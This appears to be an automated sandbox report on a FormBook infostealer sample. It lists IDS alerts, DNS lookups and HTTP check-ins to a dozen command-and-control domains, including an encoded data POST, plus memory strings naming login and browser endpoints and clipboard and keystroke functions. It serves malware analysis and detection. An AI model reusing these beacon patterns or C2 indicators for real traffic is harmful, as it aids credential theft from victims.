Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49994 -> 81.2.196.19:80
Source: DNS query: www.93187.xyz
Source: DNS query: www.broomeorchard.xyz
Source: DNS query: www.suarahati20.xyz
Source: Joe Sandbox View | IP Address: 103.21.221.4
Source: Joe Sandbox View | IP Address: 199.192.21.169
Source: Joe Sandbox View | ASN Name: LINKNET-ID-APLinknetASNID
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View | ASN Name: TAKE2US
Source: Joe Sandbox View | ASN Name: HAWKHOSTCA
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, | 0_2_004422FE
Source: global traffic | HTTP traffic detected:
    GET /i7xp/?-L=kBMxZFRpAD6P&gP=1hYOXgym/+H9levAkr4ECV6rOYKZY3gLAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+By3ei+nF7KhZYXgTY0pVgzUu8kB5fl+xjkuOc= HTTP/1.1
    Host: www.whats-in-the-box.org
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /8z5k/?gP=y1aGUeBTtCWB8PYjxeZy4U2j9UMFcfikuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlakKzrkp/pGyXsuE4toY6QkeuA/Y2UZTirzw=&-L=kBMxZFRpAD6P HTTP/1.1
    Host: www.1183377.app
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVpZIGkHJVy9sLRLBvFWiGcqamlVlCdw8MyQ8= HTTP/1.1
    Host: www.52ywq.vip
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /d8cw/?gP=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5otm2v66eMoudDkD1QDiauZF6PALhNXvt3BHI=&-L=kBMxZFRpAD6P HTTP/1.1
    Host: www.zenscape.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /jsqu/?-L=kBMxZFRpAD6P&gP=j6JGavFFAQYaoSsk3MdZismLyTuecDBS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuAECuXdbdVwd/lx4BGGAWHgBLP9AhssTD5eI= HTTP/1.1
    Host: www.asociacia.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /jyeu/?gP=KiLVsdjbhLGFnrJehKTzSS0IkzcAWv/LJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY3/QPGqQrPglnah1puMp4IzQunG6SYXgyDdEY=&-L=kBMxZFRpAD6P HTTP/1.1
    Host: www.93187.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIP+nYbA/MCobApDN+18WI9d8e3Vo/1w2CbZc=&-L=kBMxZFRpAD6P HTTP/1.1
    Host: www.tempatmudisini01.click
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /xweg/?-L=kBMxZFRpAD6P&gP=zyGgAOIUWHAkjy53XOab1MtcQdyBzOoJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8d8gi4CXplyUvpH+a6MWSZKg7Sn8a+cnOgQs= HTTP/1.1
    Host: www.o731lh.vip
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2ho9/?gP=sZDoihg8ajsFNu4sFB4wVMG24nWUkQUSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3H5WrA65sHfIkn+XzJEmDgF1B4fp1cD4x67M=&-L=kBMxZFRpAD6P HTTP/1.1Host: www.consultarfacil.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8o1o/?-L=kBMxZFRpAD6P&gP=QunhVm6kZFQCJjGkuC7lsmN7UDLhVH5unS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjT9kB1XQFiuYG2+iOt7QfZQyJLxqfhY4aAGU= HTTP/1.1Host: www.broomeorchard.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4est/?gP=6TioOITzTznuWaHCUWnl//RNTiJIkSIqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXlY89F3XW39p23v05UDH3lWqOp67DGsRlWdM=&-L=kBMxZFRpAD6P HTTP/1.1Host: www.suarahati20.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8qne/?-L=kBMxZFRpAD6P&gP=KTDLAip6979182YpgYgwlP0twqrvN2KjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdczwn6nM8FHB3uPZpUzCEofVeYgOE3F6jmTm8= HTTP/1.1Host: www.nmh6.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | DNS traffic detected: DNS query: www.whats-in-the-box.org
            Source: global traffic | DNS traffic detected: DNS query: www.1183377.app
            Source: global traffic | DNS traffic detected: DNS query: www.52ywq.vip
            Source: global traffic | DNS traffic detected: DNS query: www.zenscape.top
            Source: global traffic | DNS traffic detected: DNS query: www.asociacia.online
            Source: global traffic | DNS traffic detected: DNS query: www.93187.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.insicilia.today
            Source: global traffic | DNS traffic detected: DNS query: www.tempatmudisini01.click
            Source: global traffic | DNS traffic detected: DNS query: www.o731lh.vip
            Source: global traffic | DNS traffic detected: DNS query: www.consultarfacil.online
            Source: global traffic | DNS traffic detected: DNS query: www.broomeorchard.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.suarahati20.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.nmh6.site
            Source: unknown | HTTP traffic detected: POST /8z5k/ HTTP/1.1
                Host: www.1183377.app
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Connection: close
                Content-Length: 199
                Origin: http://www.1183377.app
                Referer: http://www.1183377.app/8z5k/
                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                Data Ascii: gP=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu6YfCJpTsXTcCpGoh3vdlyznCqhwZI7XnZg==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 08 Oct 2024 13:55:39 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 774
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 08 Oct 2024 13:55:42 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 774
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 08 Oct 2024 13:55:45 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 774
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 08 Oct 2024 13:55:47 GMT
                Server: Apache
                X-Frame-Options: SAMEORIGIN
                Content-Length: 774
                X-XSS-Protection: 1; mode=block
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 08 Oct 2024 13:55:53 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 08 Oct 2024 13:55:56 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 08 Oct 2024 13:55:58 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 08 Oct 2024 13:56:01 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 08 Oct 2024 13:56:07 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66c48d46-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 08 Oct 2024 13:56:10 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66c48d46-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 08 Oct 2024 13:56:12 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66c48d46-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 08 Oct 2024 13:56:15 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66c48d46-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 08 Oct 2024 13:56:15 GMT
                Content-Type: text/html
                Content-Length: 148
                Connection: close
                ETag: "66c48d46-94"
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/7.4.33
                x-litespeed-tag: 894_HTTP.404
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                content-type: text/html; charset=UTF-8
                link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                x-litespeed-cache-control: no-cache
                cache-control: no-cache, no-store, must-revalidate, max-age=0
                transfer-encoding: chunked
                content-encoding: br
                vary: Accept-Encoding
                date: Tue, 08 Oct 2024 13:56:30 GMT
                server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/7.4.33
                x-litespeed-tag: 894_HTTP.404
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                content-type: text/html; charset=UTF-8
                link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                x-litespeed-cache-control: no-cache
                cache-control: no-cache, no-store, must-revalidate, max-age=0
                transfer-encoding: chunked
                content-encoding: br
                vary: Accept-Encoding
                date: Tue, 08 Oct 2024 13:56:33 GMT
                server: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: 894_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 08 Oct 2024 13:56:35 GMTserver: LiteSpeedData Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 a2 3b 25 f5 33 38 54 d5 ac d1 9e 9e 85 fd 5a 42 7d 9c ed cb c1 0a 07 12 a1 c2 17 41 78 3d d2 5a 04 69 74 c6 73 07 f2 d2 b0 73 b7 6d c1 6f 88 cd c0 8d 65 b0 7f ef 59 8b d8 64 84 ae a3 ec 67 d3 75 a8 83 27 50 0a a2 46 69 ca ef 14 a1 c7 2e 3a 3f fd db f8 34 58 ec cc 57 f9 1e 43 90 fa e0 a1 82 91 ec 85 c7 8f 4e 91 32 92 e3 3e 64 0f 99 67 03 33 ee f0 b0 2a 4d b7 87 ac 36 0e 1f 32 04 2f e3 43 96 2f 19 67 f3 87 6c 5d 9c d7 c5 43 46 52 82 e7 40 4a 
72 fa 8b e7 43 4a fc e9 80 33 eb 4f 87 8f 36 7f 3a fc fa fd 2e 7f ba 24 d3 bb 1a 49 39 92 da e8 5a 84 a0 82 66 88 c2 22 97 67 3e 64 83 a5 15 40 ee 21 fb ea 67 42 bc 77 9c 3a 54 28 3c b2 4e 6a f6 d5 7f 7f 42 57 ad d8 8a 15 e4 7a dd 46 d9 cb 9b 7d 36 9c 5c 2b 15 82 f4 20 fa 60 e8 be 01 e6 c6 06 5e 66 d1 cd ca 3f 97 1b cb 54 27 e3 49 38 30 a9 4f 71 bb ac 3b d4 31 26 63 70 97 e5 ad a1 1a f7 6b b8 d0 07 f4 c1 97 98 b6 22 e9 b2 ae 6e 4c d8 61 f0 fe 14 5e b7 71 72 dd 7a f4 5e 1a fd 3e 18 27 0e c8 3c 86 3f 03 76 b1 49 ff 7a ff fa 3f cc 07 27 f5 41 b6 97 38 24 c9 b5 52 6e 1d af 57 12 7e 5e 1b 63 1a 52 9d 8c c8 f6 4e 7d 2d de 61 1d 62 9e f2 14 59 2d f4 49 78 56 5f a8 59 72 d7 96 d7 2a 49 91 b5 52 a9 0f 78 0e 71 48 79 ca 93 6d 22 de a0 35 0e f0 51 ea 30 2f 7e 74 4e 5c 62 64 Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:57:23 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:57:26 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:57:28 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:57:31 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: write.exe, 0000000B.00000002.3747327536.0000000005C22000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.00000000039E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://tempatmudisini01.click/abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs
            Source: UCAmCgWJyh.exe, 0000000D.00000002.3748863633.0000000004F8E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nmh6.site
            Source: UCAmCgWJyh.exe, 0000000D.00000002.3748863633.0000000004F8E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nmh6.site/8qne/
            Source: write.exe, 0000000B.00000002.3747327536.0000000005448000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000003208000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://6329.vhjhbv.com/4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UC
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 0000000B.00000002.3747327536.00000000055DA000.00000004.10000000.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.000000000339A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 0000000B.00000003.1913753379.00000000078CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 0000000B.00000002.3743884868.0000000002B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 0000000B.00000002.3749537044.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
